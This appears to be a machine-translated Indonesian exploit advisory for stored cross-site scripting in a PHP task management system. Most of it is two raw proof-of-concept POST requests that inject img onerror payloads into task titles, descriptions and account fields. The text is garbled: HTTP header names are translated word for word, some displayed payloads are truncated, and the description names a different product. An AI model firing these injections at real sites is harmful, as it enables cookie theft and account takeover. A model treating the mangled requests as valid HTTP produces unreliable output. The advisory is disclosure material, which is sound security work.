# Eksploitasi Penulis: mampu403
# Tanggal: 08/12/2021
# Beranda Vendor: https://www.sourcecoster.com/php/15030/employee-daily-task-management-system-php-and-sqlite-source-code.html
# Tautan Perangkat Lunak: https://www.sourcecoster.com/sites/default/files/download/oretnom23/edtms.zip
# Versi: 1.0
# Diuji pada: windows 10
# Halaman rentan: ?page=view_task&id=2
Deskripsi teknis:
Sistem pemesanan dan reservasi acara online XSS yang tersimpan. Penyerang dapat memanfaatkan kerentanan ini untuk menjalankan javascript atas nama peselancar server web, yang dapat menyebabkan pencurian cookie, perusakan wajah, dan banyak lagi.
xss-1:
1) Navigasikan ke http://localhost/?page=view_task&id=2 dan denting “edit tugas”
2) Masukkan payload Anda di parameter parameter “judul” dan “Deskripsi Tugas”
3) Klik simpan
Bukti konsep (Poc):
Payload berikut akan memungkinkan Anda untuk menjalankan javascript –
“>
—
POST /Actions.php?a=save_task HTTP/1.1
Tuan rumah: localhost
Agen-Pengguna: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Terima: aplikasi/json, teks/javascript, */*; q=0,01
Terima-Bahasa: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Terima-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; rangkaian karakter = UTF-8
X-Diminta-Dengan: XMLHttpRequest
Konten-Panjang: 312
Asal: http://localhost
Koneksi: tutup
Perujuk: http://localhost/?page=tasks
Cookie: PHPSESSID=p98m8ort59hfbo3qdu2o4a59cl
id=2&title=Tugas+102%22%3E%3Cimg+src%3D%23+onerror%3Dalert(123)%3E&status=1&assign_to%5B%5D=2&description=%3Cp%3EIni+adalah+tugas+untuk+ kamu.%3C%2Fp%3E%3Cp%3EIni+deskripsi+telah+telah+diperbarui%3C%2Fp%3E%3Cp%3E%3Cbr%3E%3C%2Fp%3E%3Cp%3E%22%26gt%3B %26lt%3Bimg+src%3D%23+onerror%3Dalert(333)%26gt%3B%3Cbr%3E%3C%2Fp%3E
xss-2
1) Navigasikan ke http://localhost.com/?page=manage_account
2) Masukkan payload Anda di parameter parameter “nama lengkap” atau “kontak” atau “email”
Bukti konsep (Poc):
Payload berikut akan memungkinkan Anda untuk menjalankan javascript –
“>
—
POST /Actions.php?a=update_credentials_employee HTTP/1.1
Tuan rumah: localhost
Agen-Pengguna: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Terima: aplikasi/json, teks/javascript, */*; q=0,01
Terima-Bahasa: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Terima-Encoding: gzip, deflate
X-Diminta-Dengan: XMLHttpRequest
Content-Type: multipart/form-data; batas=—————————27882107026209045483167935384
Konten-Panjang: 1613
Asal: http://localhost
Koneksi: tutup
Perujuk: http://localhost/?page=manage_account
Cookie: PHPSESSID=p98m8ort59hfbo3qdu2o4a59cl
—————————– 27882107026209045483167935384
Isi-Disposisi: formulir-data; nama = “id”
1
—————————– 27882107026209045483167935384
Isi-Disposisi: formulir-data; nama = “nama lengkap”
John D Smith
—————————– 27882107026209045483167935384
Isi-Disposisi: formulir-data; nama = “jenis kelamin”
Pria
—————————– 27882107026209045483167935384
Isi-Disposisi: formulir-data; nama=”dob”
1997-06-23
—————————– 27882107026209045483167935384
Isi-Disposisi: formulir-data; nama=”kontak”
098123456789″>
—————————– 27882107026209045483167935384
Isi-Disposisi: formulir-data; nama=”email”
[email protected]
—————————– 27882107026209045483167935384
Isi-Disposisi: formulir-data; nama = “alamat”
Contoh Alamat
—————————– 27882107026209045483167935384
Isi-Disposisi: formulir-data; nama=”departemen_id”
1
—————————– 27882107026209045483167935384
Isi-Disposisi: formulir-data; nama=”email”
[email protected]
—————————– 27882107026209045483167935384
Isi-Disposisi: formulir-data; nama = “kata sandi”
—————————– 27882107026209045483167935384
Isi-Disposisi: formulir-data; nama=”old_password”
—————————– 27882107026209045483167935384
Isi-Disposisi: formulir-data; nama=”avatar”; nama file=””
Tipe-Konten: aplikasi/aliran oktet
—————————– 27882107026209045483167935384–
